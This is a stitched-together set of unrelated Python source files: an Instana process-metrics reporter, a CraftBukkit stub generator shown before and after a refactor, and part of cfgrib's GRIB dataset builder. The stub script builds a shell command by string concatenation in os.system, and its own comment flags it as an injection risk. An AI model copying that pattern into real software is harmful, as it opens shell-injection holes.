last_metrics = None
def __init__(self, sensor):
self.sensor = sensor
self.run()
def run(self):
self.timer = t.Thread(target=self.collect_and_report)
self.timer.daemon = True
self.timer.name = "Instana Metric Collection"
self.timer.start()
def collect_and_report(self):
while 1:
self.process()
time.sleep(1)
def process(self):
if self.sensor.agent.can_send():
self.snapshot_countdown = self.snapshot_countdown - 1
ss = None
cm = self.collect_metrics()
if self.snapshot_countdown < 1:
self.snapshot_countdown = self.SNAPSHOT_PERIOD
ss = self.collect_snapshot()
md = copy.deepcopy(cm).delta_data(None)
else:
md = copy.deepcopy(cm).delta_data(self.last_metrics)
ed = EntityData(pid=self.sensor.agent.from_.pid, snapshot=ss, metrics=md)
url = self.sensor.agent.make_url(a.AGENT_DATA_URL)
self.sensor.agent.request(url, "POST", ed)
self.last_metrics = cm.__dict__
def collect_snapshot(self):
try:
if "FLASK_APP" in os.environ:
appname = os.environ["FLASK_APP"]
elif "DJANGO_SETTINGS_MODULE" in os.environ:
appname = os.environ["DJANGO_SETTINGS_MODULE"].split('.')[0]
else:
appname = os.path.basename(sys.executable)
s = Snapshot(name=appname,
version=sys.version,
rlimit_core=resource.getrlimit(resource.RLIMIT_CORE),
rlimit_cpu=resource.getrlimit(resource.RLIMIT_CPU),
rlimit_fsize=resource.getrlimit(
resource.RLIMIT_FSIZE),
rlimit_data=resource.getrlimit(resource.RLIMIT_DATA),
rlimit_stack=resource.getrlimit(
resource.RLIMIT_STACK),
rlimit_rss=resource.getrlimit(resource.RLIMIT_RSS),
rlimit_nproc=resource.getrlimit(
resource.RLIMIT_NPROC),
rlimit_nofile=resource.getrlimit(
resource.RLIMIT_NOFILE),
rlimit_memlock=resource.getrlimit(
resource.RLIMIT_MEMLOCK),
rlimit_as=resource.getrlimit(resource.RLIMIT_AS),
versions=self.collect_modules())
return s
except Exception as e:
l.error("collect_snapshot: ", str(e))
return None
def jsonable(self, value):
if callable(value):
result = value()
elif type(value) is ModuleType:
result = str(value)
else:
result = value
return result
def collect_modules(self):
try:
m = sys.modules
r = {}
for k in m:
if m[k]:
d = m[k].__dict__
if "version" in d and d["version"]:
r[k] = self.jsonable(d["version"])
elif "__version__" in d and d["__version__"]:
r[k] = self.jsonable(d["__version__"])
else:
r[k] = "builtin"
return r
except Exception as e:
l.error("collect_modules: ", e)
return None
def collect_metrics(self):
u = resource.getrusage(resource.RUSAGE_SELF)
if gc_.isenabled():
c = list(gc_.get_count())
th = list(gc_.get_threshold())
g = GC(collect0=c[0] if not self.last_collect else c[0] - self.last_collect[0],
collect1=c[1] if not self.last_collect else c[
1] - self.last_collect[1],
collect2=c[2] if not self.last_collect else c[
2] - self.last_collect[2],
threshold0=th[0],
threshold1=th[1],
threshold2=th[2])
thr = t.enumerate()
daemon_threads = len([tr.daemon and tr.is_alive() for tr in thr])
alive_threads = len([not tr.daemon and tr.is_alive() for tr in thr])
dead_threads = len([not tr.is_alive() for tr in thr])
m = Metrics(ru_utime=u[0] if not self.last_usage else u[0] - self.last_usage[0],
ru_stime=u[1] if not self.last_usage else u[1] - self.last_usage[1],
ru_maxrss=u[2],
ru_ixrss=u[3],
ru_idrss=u[4],
ru_isrss=u[5],
ru_minflt=u[6] if not self.last_usage else u[6] - self.last_usage[6],
ru_majflt=u[7] if not self.last_usage else u[7] - self.last_usage[7],
ru_nswap=u[8] if not self.last_usage else u[8] - self.last_usage[8],
ru_inblock=u[9] if not self.last_usage else u[9] - self.last_usage[9],
ru_oublock=u[10] if not self.last_usage else u[10] - self.last_usage[10],
ru_msgsnd=u[11] if not self.last_usage else u[11] - self.last_usage[11],
ru_msgrcv=u[12] if not self.last_usage else u[12] - self.last_usage[12],
ru_nsignals=u[13] if not self.last_usage else u[13] - self.last_usage[13],
ru_nvcs=u[14] if not self.last_usage else u[14] - self.last_usage[14],
ru_nivcsw=u[15] if not self.last_usage else u[15] - self.last_usage[15],
alive_threads=alive_threads,
dead_threads=dead_threads,
daemon_threads=daemon_threads,
gc=g)
self.last_usage = u
if gc_.isenabled():
self.last_collect = c
return m
Convert exception to string
Because log object expects strings only
import threading as t
import instana.log as l
import resource
import os
import gc as gc_
import sys
import instana.agent_const as a
import copy
import time
import json
from types import ModuleType
class Snapshot(object):
name = None
version = None
rlimit_core = (0, 0)
rlimit_cpu = (0, 0)
rlimit_fsize = (0, 0)
rlimit_data = (0, 0)
rlimit_stack = (0, 0)
rlimit_rss = (0, 0)
rlimit_nproc = (0, 0)
rlimit_nofile = (0, 0)
rlimit_memlock = (0, 0)
rlimit_as = (0, 0)
versions = None
def __init__(self, **kwds):
self.__dict__.update(kwds)
def to_dict(self):
kvs = dict()
kvs['name'] = self.name
kvs['version'] = self.version
kvs['versions'] = self.versions
return kvs
class GC(object):
collect0 = 0
collect1 = 0
collect2 = 0
threshold0 = 0
threshold1 = 0
threshold2 = 0
def __init__(self, **kwds):
self.__dict__.update(kwds)
def to_dict(self):
return self.__dict__
class Metrics(object):
ru_utime = .0
ru_stime = .0
ru_maxrss = 0
ru_ixrss = 0
ru_idrss = 0
ru_isrss = 0
ru_minflt = 0
ru_majflt = 0
ru_nswap = 0
ru_inblock = 0
ru_oublock = 0
ru_msgsnd = 0
ru_msgrcv = 0
ru_nsignals = 0
ru_nvcs = 0
ru_nivcsw = 0
dead_threads = 0
alive_threads = 0
daemon_threads = 0
gc = None
def __init__(self, **kwds):
self.__dict__.update(kwds)
def delta_data(self, delta):
data = self.__dict__
if delta is None:
return data
unchanged_items = set(data.items()) & set(delta.items())
for x in unchanged_items:
data.pop(x[0])
return data
def to_dict(self):
return self.__dict__
class EntityData(object):
pid = 0
snapshot = None
metrics = None
def __init__(self, **kwds):
self.__dict__.update(kwds)
def to_dict(self):
return self.__dict__
class Meter(object):
SNAPSHOT_PERIOD = 600
snapshot_countdown = 35
sensor = None
last_usage = None
last_collect = None
timer = None
last_metrics = None
def __init__(self, sensor):
self.sensor = sensor
self.run()
def run(self):
self.timer = t.Thread(target=self.collect_and_report)
self.timer.daemon = True
self.timer.name = "Instana Metric Collection"
self.timer.start()
def collect_and_report(self):
while 1:
self.process()
time.sleep(1)
def process(self):
if self.sensor.agent.can_send():
self.snapshot_countdown = self.snapshot_countdown - 1
ss = None
cm = self.collect_metrics()
if self.snapshot_countdown < 1:
self.snapshot_countdown = self.SNAPSHOT_PERIOD
ss = self.collect_snapshot()
md = copy.deepcopy(cm).delta_data(None)
else:
md = copy.deepcopy(cm).delta_data(self.last_metrics)
ed = EntityData(pid=self.sensor.agent.from_.pid, snapshot=ss, metrics=md)
url = self.sensor.agent.make_url(a.AGENT_DATA_URL)
self.sensor.agent.request(url, "POST", ed)
self.last_metrics = cm.__dict__
def collect_snapshot(self):
try:
if "FLASK_APP" in os.environ:
appname = os.environ["FLASK_APP"]
elif "DJANGO_SETTINGS_MODULE" in os.environ:
appname = os.environ["DJANGO_SETTINGS_MODULE"].split('.')[0]
else:
appname = os.path.basename(sys.executable)
s = Snapshot(name=appname,
version=sys.version,
rlimit_core=resource.getrlimit(resource.RLIMIT_CORE),
rlimit_cpu=resource.getrlimit(resource.RLIMIT_CPU),
rlimit_fsize=resource.getrlimit(
resource.RLIMIT_FSIZE),
rlimit_data=resource.getrlimit(resource.RLIMIT_DATA),
rlimit_stack=resource.getrlimit(
resource.RLIMIT_STACK),
rlimit_rss=resource.getrlimit(resource.RLIMIT_RSS),
rlimit_nproc=resource.getrlimit(
resource.RLIMIT_NPROC),
rlimit_nofile=resource.getrlimit(
resource.RLIMIT_NOFILE),
rlimit_memlock=resource.getrlimit(
resource.RLIMIT_MEMLOCK),
rlimit_as=resource.getrlimit(resource.RLIMIT_AS),
versions=self.collect_modules())
return s
except Exception as e:
l.error("collect_snapshot: ", str(e))
return None
def jsonable(self, value):
if callable(value):
result = value()
elif type(value) is ModuleType:
result = str(value)
else:
result = value
return result
def collect_modules(self):
try:
m = sys.modules
r = {}
for k in m:
if m[k]:
d = m[k].__dict__
if "version" in d and d["version"]:
r[k] = self.jsonable(d["version"])
elif "__version__" in d and d["__version__"]:
r[k] = self.jsonable(d["__version__"])
else:
r[k] = "builtin"
return r
except Exception as e:
l.error("collect_modules: ", str(e))
return None
def collect_metrics(self):
u = resource.getrusage(resource.RUSAGE_SELF)
if gc_.isenabled():
c = list(gc_.get_count())
th = list(gc_.get_threshold())
g = GC(collect0=c[0] if not self.last_collect else c[0] - self.last_collect[0],
collect1=c[1] if not self.last_collect else c[
1] - self.last_collect[1],
collect2=c[2] if not self.last_collect else c[
2] - self.last_collect[2],
threshold0=th[0],
threshold1=th[1],
threshold2=th[2])
thr = t.enumerate()
daemon_threads = len([tr.daemon and tr.is_alive() for tr in thr])
alive_threads = len([not tr.daemon and tr.is_alive() for tr in thr])
dead_threads = len([not tr.is_alive() for tr in thr])
m = Metrics(ru_utime=u[0] if not self.last_usage else u[0] - self.last_usage[0],
ru_stime=u[1] if not self.last_usage else u[1] - self.last_usage[1],
ru_maxrss=u[2],
ru_ixrss=u[3],
ru_idrss=u[4],
ru_isrss=u[5],
ru_minflt=u[6] if not self.last_usage else u[6] - self.last_usage[6],
ru_majflt=u[7] if not self.last_usage else u[7] - self.last_usage[7],
ru_nswap=u[8] if not self.last_usage else u[8] - self.last_usage[8],
ru_inblock=u[9] if not self.last_usage else u[9] - self.last_usage[9],
ru_oublock=u[10] if not self.last_usage else u[10] - self.last_usage[10],
ru_msgsnd=u[11] if not self.last_usage else u[11] - self.last_usage[11],
ru_msgrcv=u[12] if not self.last_usage else u[12] - self.last_usage[12],
ru_nsignals=u[13] if not self.last_usage else u[13] - self.last_usage[13],
ru_nvcs=u[14] if not self.last_usage else u[14] - self.last_usage[14],
ru_nivcsw=u[15] if not self.last_usage else u[15] - self.last_usage[15],
alive_threads=alive_threads,
dead_threads=dead_threads,
daemon_threads=daemon_threads,
gc=g)
self.last_usage = u
if gc_.isenabled():
self.last_collect = c
return m
|
Skipping inline/out of line tests for now on Python 3 64-bit. This will need to be fixed eventually but for now is tested through other means (we generate and test the wheel we produce.)
|
#!/usr/bin/python
import subprocess
import os
CB_CLASS_LIST = "../forge/classes-patched-cb-mcdev"
ALL_CLASS_LIST_SRG = "../jars/cb2mcp.srg"
MC_DEV_EXTRACTED_DIR = "../jars/mc-dev"
OUT_STUB_DIR = "../CraftBukkit/src/main/java/"
def getPatchedByCB():
return set([x.strip() for x in file(CB_CLASS_LIST).readlines()])
def getAll():
# get all classes, with mcdev namings
classes = []
fields = {}
for line in file("../jars/cb2mcp.srg").readlines():
line = line.strip()
tokens = line.split(" ")
if tokens[0] == "CL:":
classes.append(tokens[1])
return set(classes)
unpatched = getAll() - getPatchedByCB()
for fullClassPath in sorted(list(unpatched)):
filename = OUT_STUB_DIR + fullClassPath + ".java"
if os.path.exists(filename):
#print "File already exists:",filename
#raise SystemExit
pass
if not os.path.exists(os.path.dirname(filename)):
# org/ dirs need to be created; CB only has net/
#os.mkdir(os.path.dirname(filename)) # need recursive mkdir
os.system("mkdir -p " + os.path.dirname(filename)) # warning: injection
print filename
f = file(filename, "w")
package = ".".join(fullClassPath.split("/")[:-1])
className = fullClassPath.split("/")[-1]
header = """// Auto-generated methods stubs for %s
package %s;
import org.apache.commons.lang.NotImplementedException;
""" % (className, package)
f.write(header)
lines = subprocess.Popen(["javap", "-classpath", MC_DEV_EXTRACTED_DIR, fullClassPath], stdout=subprocess.PIPE).communicate()[0].split("\n")
if "Compiled" in lines[0]:
lines = lines[1:] # skip initial "Compiled from" line, if present
for line in lines:
line = line.replace(package + ".", "") # already in package
line = line.replace(" final ", " ") #
if "{}" in line:
# Skip static initializer (always empty)
continue
if ")" in line:
# Methods - add parameter names and body
parts = line.split("(")
retn = parts[0]
args = parts[1].replace(");", "").split(", ")
if len(args) == 1 and len(args[0]) == 0: args = []
namedArgs = []
for i, arg in enumerate(args):
namedArgs.append("%s par%d" % (arg, i + 1))
if " abstract " in line:
# abstract methods can't have a body
body = ";"
else:
body = "{ throw new NotImplementedException(); }"
line = retn + "(" + ", ".join(namedArgs) + ")" + body
elif line.startswith(" public static") or line.startswith(" protecte static"): # not doing private
# static fields need initializers
tokens = line.strip().replace(";","").split(" ")
name = tokens[-1]
if "byte" in tokens or "short" in tokens or "int" in tokens:
default = "0"
elif "long" in tokens:
default = "0L"
elif "float" in tokens:
default = "0.0f"
elif "double" in tokens:
default = "0.0d"
elif "char" in tokens:
default = "'\u0000'"
elif "boolean" in tokens:
default = "false";
else:
default = "null";
line = line.replace(";", " = %s;" % (default,))
f.write(line + "\n")
f.close()
Move to generateStubFromJavap()
#!/usr/bin/python
import subprocess
import os
CB_CLASS_LIST = "../forge/classes-patched-cb-mcdev"
ALL_CLASS_LIST_SRG = "../jars/cb2mcp.srg"
MC_DEV_EXTRACTED_DIR = "../jars/mc-dev"
OUT_STUB_DIR = "../CraftBukkit/src/main/java/"
"""Get classes patched by CraftBukkit"""
def getPatchedByCB():
return set([x.strip() for x in file(CB_CLASS_LIST).readlines()])
"""Get all classes (with mc-dev namings)"""
def getAll():
classes = []
fields = {}
for line in file("../jars/cb2mcp.srg").readlines():
line = line.strip()
tokens = line.split(" ")
if tokens[0] == "CL:":
classes.append(tokens[1])
return set(classes)
"""An attempt at generating compatible but empty methods stubs from javap."""
def generateStubFromJavap(fullClassPath, filename):
f = file(filename, "w")
package = ".".join(fullClassPath.split("/")[:-1])
className = fullClassPath.split("/")[-1]
header = """// Auto-generated methods stubs for %s
package %s;
import org.apache.commons.lang.NotImplementedException;
""" % (className, package)
f.write(header)
lines = subprocess.Popen(["javap", "-classpath", MC_DEV_EXTRACTED_DIR, fullClassPath], stdout=subprocess.PIPE).communicate()[0].split("\n")
if "Compiled" in lines[0]:
lines = lines[1:] # skip initial "Compiled from" line, if present
for line in lines:
line = line.replace(package + ".", "") # already in package
line = line.replace(" final ", " ") #
if "{}" in line:
# Skip static initializer (always empty)
continue
if ")" in line:
# Methods - add parameter names and body
parts = line.split("(")
retn = parts[0]
args = parts[1].replace(");", "").split(", ")
if len(args) == 1 and len(args[0]) == 0: args = []
namedArgs = []
for i, arg in enumerate(args):
namedArgs.append("%s par%d" % (arg, i + 1))
if " abstract " in line:
# abstract methods can't have a body
body = ";"
else:
body = "{ throw new NotImplementedException(); }"
line = retn + "(" + ", ".join(namedArgs) + ")" + body
elif line.startswith(" public static") or line.startswith(" protecte static"): # not doing private
# static fields need initializers
tokens = line.strip().replace(";","").split(" ")
name = tokens[-1]
if "byte" in tokens or "short" in tokens or "int" in tokens:
default = "0"
elif "long" in tokens:
default = "0L"
elif "float" in tokens:
default = "0.0f"
elif "double" in tokens:
default = "0.0d"
elif "char" in tokens:
default = "'\u0000'"
elif "boolean" in tokens:
default = "false";
else:
default = "null";
line = line.replace(";", " = %s;" % (default,))
f.write(line + "\n")
f.close()
def main():
unpatched = getAll() - getPatchedByCB()
for fullClassPath in sorted(list(unpatched)):
filename = OUT_STUB_DIR + fullClassPath + ".java"
if os.path.exists(filename):
#print "File already exists:",filename
#raise SystemExit
pass
if not os.path.exists(os.path.dirname(filename)):
# org/ dirs need to be created; CB only has net/
#os.mkdir(os.path.dirname(filename)) # need recursive mkdir
os.system("mkdir -p " + os.path.dirname(filename)) # warning: injection
print filename
generateStubFromJavap(fullClassPath, filename)
if __name__ == "__main__":
main()
|
#
# Copyright 2017-2021 European Centre for Medium-Range Weather Forecasts (ECMWF).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Alessandro Amici - B-Open - https://bopen.eu
# Aureliana Barghini - B-Open - https://bopen.eu
#
import datetime
import json
import logging
import os
import typing as T
import attr
import numpy as np # type: ignore
from . import __version__, cfmessage, messages
LOG = logging.getLogger(__name__)
#
# Edition-independent keys in ecCodes namespaces. Documented in:
# https://software.ecmwf.int/wiki/display/ECC/GRIB%3A+Namespaces
#
GLOBAL_ATTRIBUTES_KEYS = ["edition", "centre", "centreDescription", "subCentre"]
DATA_ATTRIBUTES_KEYS = [
"paramId",
"dataType",
"numberOfPoints",
"typeOfLevel",
"stepUnits",
"stepType",
"gridType",
]
EXTRA_DATA_ATTRIBUTES_KEYS = [
"shortName",
"units",
"name",
"cfName",
"cfVarName",
"missingValue",
"totalNumber",
"numberOfDirections",
"numberOfFrequencies",
"NV",
"gridDefinitionDescription",
]
GRID_TYPE_MAP = {
"regular_ll": [
"Nx",
"iDirectionIncrementInDegrees",
"iScansNegatively",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfLastGridPointInDegrees",
"Ny",
"jDirectionIncrementInDegrees",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfLastGridPointInDegrees",
],
"rotated_ll": [
"Nx",
"Ny",
"angleOfRotationInDegrees",
"iDirectionIncrementInDegrees",
"iScansNegatively",
"jDirectionIncrementInDegrees",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfLastGridPointInDegrees",
"latitudeOfSouthernPoleInDegrees",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfLastGridPointInDegrees",
"longitudeOfSouthernPoleInDegrees",
],
"reduced_ll": [
"Ny",
"jDirectionIncrementInDegrees",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfLastGridPointInDegrees",
],
"regular_gg": [
"Nx",
"iDirectionIncrementInDegrees",
"iScansNegatively",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfLastGridPointInDegrees",
"N",
"Ny",
],
"rotated_gg": [
"Nx",
"Ny",
"angleOfRotationInDegrees",
"iDirectionIncrementInDegrees",
"iScansNegatively",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfLastGridPointInDegrees",
"latitudeOfSouthernPoleInDegrees",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfLastGridPointInDegrees",
"longitudeOfSouthernPoleInDegrees",
"N",
],
"lambert": [
"LaDInDegrees",
"LoVInDegrees",
"iScansNegatively",
"jPointsAreConsecutive",
"jScansPositively",
"latitudeOfFirstGridPointInDegrees",
"latitudeOfSouthernPoleInDegrees",
"longitudeOfFirstGridPointInDegrees",
"longitudeOfSouthernPoleInDegrees",
"DyInMetres",
"DxInMetres",
"Latin2InDegrees",
"Latin1InDegrees",
"Ny",
"Nx",
],
"reduced_gg": ["N", "pl"],
"sh": ["M", "K", "J"],
}
GRID_TYPE_KEYS = sorted(set(k for _, ks in GRID_TYPE_MAP.items() for k in ks))
ENSEMBLE_KEYS = ["number"]
VERTICAL_KEYS = ["level:float"]
DATA_TIME_KEYS = ["dataDate", "dataTime", "endStep"]
ALL_REF_TIME_KEYS = [
"time",
"step",
"valid_time",
"verifying_time",
"forecastMonth",
"indexing_time",
]
SPECTRA_KEYS = ["directionNumber", "frequencyNumber"]
ALL_HEADER_DIMS = ENSEMBLE_KEYS + VERTICAL_KEYS + SPECTRA_KEYS
INDEX_KEYS = sorted(
GLOBAL_ATTRIBUTES_KEYS + DATA_ATTRIBUTES_KEYS + DATA_TIME_KEYS + ALL_HEADER_DIMS
)
COORD_ATTRS = {
# geography
"latitude": {"units": "degrees_north", "standard_name": "latitude", "long_name": "latitude"},
"longitude": {"units": "degrees_east", "standard_name": "longitude", "long_name": "longitude"},
# vertical
"depthBelowLand": {
"units": "m",
"positive": "down",
"long_name": "soil depth",
"standard_name": "depth",
},
"depthBelowLandLayer": {
"units": "m",
"positive": "down",
"long_name": "soil depth",
"standard_name": "depth",
},
"hybrid": {
"units": "1",
"positive": "down",
"long_name": "hybrid level",
"standard_name": "atmosphere_hybrid_sigma_pressure_coordinate",
},
"heightAboveGround": {
"units": "m",
"positive": "up",
"long_name": "height above the surface",
"standard_name": "height",
},
"isobaricInhPa": {
"units": "hPa",
"positive": "down",
"stored_direction": "decreasing",
"standard_name": "air_pressure",
"long_name": "pressure",
},
"isobaricInPa": {
"units": "Pa",
"positive": "down",
"stored_direction": "decreasing",
"standard_name": "air_pressure",
"long_name": "pressure",
},
"isobaricLayer": {
"units": "Pa",
"positive": "down",
"standard_name": "air_pressure",
"long_name": "pressure",
},
# ensemble
"number": {
"units": "1",
"standard_name": "realization",
"long_name": "ensemble member numerical id",
},
# time
"step": {
"units": "hours",
"standard_name": "forecast_period",
"long_name": "time since forecast_reference_time",
},
"time": {
"units": "seconds since 1970-01-01T00:00:00",
"calendar": "proleptic_gregorian",
"standard_name": "forecast_reference_time",
"long_name": "initial time of forecast",
},
"indexing_time": {
"units": "seconds since 1970-01-01T00:00:00",
"calendar": "proleptic_gregorian",
"standard_name": "forecast_reference_time",
"long_name": "nominal initial time of forecast",
},
"valid_time": {
"units": "seconds since 1970-01-01T00:00:00",
"calendar": "proleptic_gregorian",
"standard_name": "time",
"long_name": "time",
},
"verifying_time": {
"units": "seconds since 1970-01-01T00:00:00",
"calendar": "proleptic_gregorian",
"standard_name": "time",
"long_name": "time",
},
"forecastMonth": {"units": "1", "long_name": "months since forecast_reference_time"},
}
class DatasetBuildError(ValueError):
def __str__(self) -> str:
return str(self.args[0])
def enforce_unique_attributes(index, attributes_keys, filter_by_keys={}):
# type: (T.Mapping[str, T.Any], T.Sequence[str], T.Dict[str, T.Any]) -> T.Dict[str, T.Any]
attributes = {} # type: T.Dict[str, T.Any]
for key in attributes_keys:
values = index[key]
if len(values) > 1:
fbks = []
for value in values:
fbk = {key: value}
fbk.update(filter_by_keys)
fbks.append(fbk)
raise DatasetBuildError("multiple values for key %r" % key, key, fbks)
if values and values[0] not in ("undef", "unknown"):
attributes["GRIB_" + key] = values[0]
return attributes
@attr.attrs(auto_attribs=True, eq=False)
class Variable(object):
dimensions: T.Tuple[str, ...]
data: np.ndarray
attributes: T.Dict[str, T.Any] = attr.attrib(default={}, repr=False)
def __eq__(self, other):
# type: (T.Any) -> bool
if other.__class__ is not self.__class__:
return NotImplemented
equal = (self.dimensions, self.attributes) == (other.dimensions, other.attributes)
return equal and np.array_equal(self.data, other.data)
def expand_item(item, shape):
# type: (T.Tuple[T.Any, ...], T.Sequence[int]) -> T.Tuple[T.List[int], ...]
expanded_item = []
for i, size in zip(item, shape):
if isinstance(i, (list, np.ndarray)):
expanded_item.append([int(e) for e in i])
elif isinstance(i, slice):
expanded_item.append(list(range(i.start or 0, i.stop or size, i.step or 1)))
elif isinstance(i, int):
expanded_item.append([i])
else:
raise TypeError("Unsupported index type %r" % type(i))
return tuple(expanded_item)
@attr.attrs(auto_attribs=True)
class OnDiskArray(object):
stream: messages.FileStream
shape: T.Tuple[int, ...]
offsets: T.Dict[T.Tuple[T.Any, ...], T.List[T.Union[int, T.Tuple[int, int]]]] = attr.attrib(
repr=False
)
missing_value: float
geo_ndim: int = attr.attrib(default=1, repr=False)
dtype = np.dtype("float32")
def build_array(self) -> np.ndarray:
"""Helper method used to test __getitem__"""
array = np.full(self.shape, fill_value=np.nan, dtype="float32")
with open(self.stream.path, "rb") as file:
for header_indexes, offset in self.offsets.items():
# NOTE: fill a single field as found in the message
message = self.stream.message_from_file(file, offset=offset[0])
values = message.message_get("values", float)
array.__getitem__(header_indexes).flat[:] = values
array[array == self.missing_value] = np.nan
return array
def __getitem__(self, item):
# type: (T.Tuple[T.Any, ...]) -> np.ndarray
header_item_list = expand_item(item[: -self.geo_ndim], self.shape)
header_item = [{ix: i for i, ix in enumerate(it)} for it in header_item_list]
array_field_shape = tuple(len(l) for l in header_item_list) + self.shape[-self.geo_ndim :]
array_field = np.full(array_field_shape, fill_value=np.nan, dtype="float32")
with open(self.stream.path, "rb") as file:
for header_indexes, offset in self.offsets.items():
try:
array_field_indexes = [it[ix] for it, ix in zip(header_item, header_indexes)]
except KeyError:
continue
# NOTE: fill a single field as found in the message
message = self.stream.message_from_file(file, offset=offset[0])
values = message.message_get("values", float)
array_field.__getitem__(tuple(array_field_indexes)).flat[:] = values
array = array_field[(Ellipsis,) + item[-self.geo_ndim :]]
array[array == self.missing_value] = np.nan
for i, it in reversed(list(enumerate(item[: -self.geo_ndim]))):
if isinstance(it, int):
array = array[(slice(None, None, None),) * i + (0,)]
return array
GRID_TYPES_DIMENSION_COORDS = {"regular_ll", "regular_gg"}
GRID_TYPES_2D_NON_DIMENSION_COORDS = {
"rotated_ll",
"rotated_gg",
"lambert",
"lambert_azimuthal_equal_area",
"albers",
"polar_stereographic",
}
def build_geography_coordinates(
first, # type: messages.Message
encode_cf, # type: T.Sequence[str]
errors, # type: str
log=LOG, # type: logging.Logger
):
# type: (...) -> T.Tuple[T.Tuple[str, ...], T.Tuple[int, ...], T.Dict[str, Variable]]
geo_coord_vars = {} # type: T.Dict[str, Variable]
grid_type = first["gridType"]
if "geography" in encode_cf and grid_type in GRID_TYPES_DIMENSION_COORDS:
geo_dims = ("latitude", "longitude") # type: T.Tuple[str, ...]
geo_shape = (first["Ny"], first["Nx"]) # type: T.Tuple[int, ...]
latitudes = np.array(first["distinctLatitudes"], ndmin=1)
geo_coord_vars["latitude"] = Variable(
dimensions=("latitude",), data=latitudes, attributes=COORD_ATTRS["latitude"].copy()
)
if latitudes[0] > latitudes[-1]:
geo_coord_vars["latitude"].attributes["stored_direction"] = "decreasing"
geo_coord_vars["longitude"] = Variable(
dimensions=("longitude",),
data=np.array(first["distinctLongitudes"], ndmin=1),
attributes=COORD_ATTRS["longitude"],
)
elif "geography" in encode_cf and grid_type in GRID_TYPES_2D_NON_DIMENSION_COORDS:
geo_dims = ("y", "x")
geo_shape = (first["Ny"], first["Nx"])
try:
geo_coord_vars["latitude"] = Variable(
dimensions=("y", "x"),
data=np.array(first["latitudes"]).reshape(geo_shape),
attributes=COORD_ATTRS["latitude"],
)
geo_coord_vars["longitude"] = Variable(
dimensions=("y", "x"),
data=np.array(first["longitudes"]).reshape(geo_shape),
attributes=COORD_ATTRS["longitude"],
)
except KeyError: # pragma: no cover
if errors != "ignore":
log.warning("ecCodes provides no latitudes/longitudes for gridType=%r", grid_type)
else:
geo_dims = ("values",)
geo_shape = (first["numberOfPoints"],)
# add secondary coordinates if ecCodes provides them
try:
latitude = first["latitudes"]
geo_coord_vars["latitude"] = Variable(
dimensions=("values",), data=np.array(latitude), attributes=COORD_ATTRS["latitude"]
)
longitude = first["longitudes"]
geo_coord_vars["longitude"] = Variable(
dimensions=("values",),
data=np.array(longitude),
attributes=COORD_ATTRS["longitude"],
)
except KeyError: # pragma: no cover
if errors != "ignore":
log.warning("ecCodes provides no latitudes/longitudes for gridType=%r", grid_type)
return geo_dims, geo_shape, geo_coord_vars
def encode_cf_first(data_var_attrs, encode_cf=("parameter", "time"), time_dims=("time", "step")):
# type: (T.MutableMapping[str, T.Any], T.Sequence[str], T.Sequence[str]) -> T.List[str]
coords_map = ENSEMBLE_KEYS[:]
param_id = data_var_attrs.get("GRIB_paramId", "undef")
data_var_attrs["long_name"] = "original GRIB paramId: %s" % param_id
data_var_attrs["units"] = "1"
if "parameter" in encode_cf:
if "GRIB_cfName" in data_var_attrs:
data_var_attrs["standard_name"] = data_var_attrs["GRIB_cfName"]
if "GRIB_name" in data_var_attrs:
data_var_attrs["long_name"] = data_var_attrs["GRIB_name"]
if "GRIB_units" in data_var_attrs:
data_var_attrs["units"] = data_var_attrs["GRIB_units"]
if "time" in encode_cf:
if set(time_dims).issubset(ALL_REF_TIME_KEYS):
coords_map.extend(time_dims)
else:
raise ValueError("time_dims %r not a subset of %r" % (time_dims, ALL_REF_TIME_KEYS))
else:
coords_map.extend(DATA_TIME_KEYS)
coords_map.extend(VERTICAL_KEYS)
coords_map.extend(SPECTRA_KEYS)
return coords_map
def read_data_var_attrs(first: messages.Message, extra_keys: T.List[str]) -> T.Dict[str, T.Any]:
attributes = {}
for key in extra_keys:
try:
attributes["GRIB_" + key] = first[key]
except:
pass
return attributes
def build_variable_components(
index: messages.FileIndex,
encode_cf: T.Sequence[str] = (),
filter_by_keys: T.Dict[str, T.Any] = {},
log: logging.Logger = LOG,
errors: str = "warn",
squeeze: bool = True,
read_keys: T.Iterable[str] = (),
time_dims: T.Sequence[str] = ("time", "step"),
extra_coords: T.Dict[str, str] = {},
) -> T.Tuple[T.Dict[str, int], Variable, T.Dict[str, Variable]]:
data_var_attrs = enforce_unique_attributes(index, DATA_ATTRIBUTES_KEYS, filter_by_keys)
grid_type_keys = GRID_TYPE_MAP.get(index.getone("gridType"), [])
extra_keys = sorted(list(read_keys) + EXTRA_DATA_ATTRIBUTES_KEYS + grid_type_keys)
first = index.first()
extra_attrs = read_data_var_attrs(first, extra_keys)
data_var_attrs.update(**extra_attrs)
coords_map = encode_cf_first(data_var_attrs, encode_cf, time_dims)
coord_name_key_map = {}
coord_vars = {}
for coord_key in coords_map:
values = index[coord_key]
if len(values) == 1 and values[0] == "undef":
log.debug("missing from GRIB stream: %r" % coord_key)
continue
orig_name = coord_key.partition(":")[0]
coord_name = orig_name
if (
"vertical" in encode_cf
and coord_name == "level"
and "GRIB_typeOfLevel" in data_var_attrs
):
coord_name = data_var_attrs["GRIB_typeOfLevel"]
coord_name_key_map[coord_name] = coord_key
attributes = {
"long_name": "original GRIB coordinate for key: %s(%s)" % (orig_name, coord_name),
"units": "1",
}
attributes.update(COORD_ATTRS.get(coord_name, {}).copy())
data = np.array(sorted(values, reverse=attributes.get("stored_direction") == "decreasing"))
dimensions = (coord_name,) # type: T.Tuple[str, ...]
if squeeze and len(values) == 1:
data = data[0]
dimensions = ()
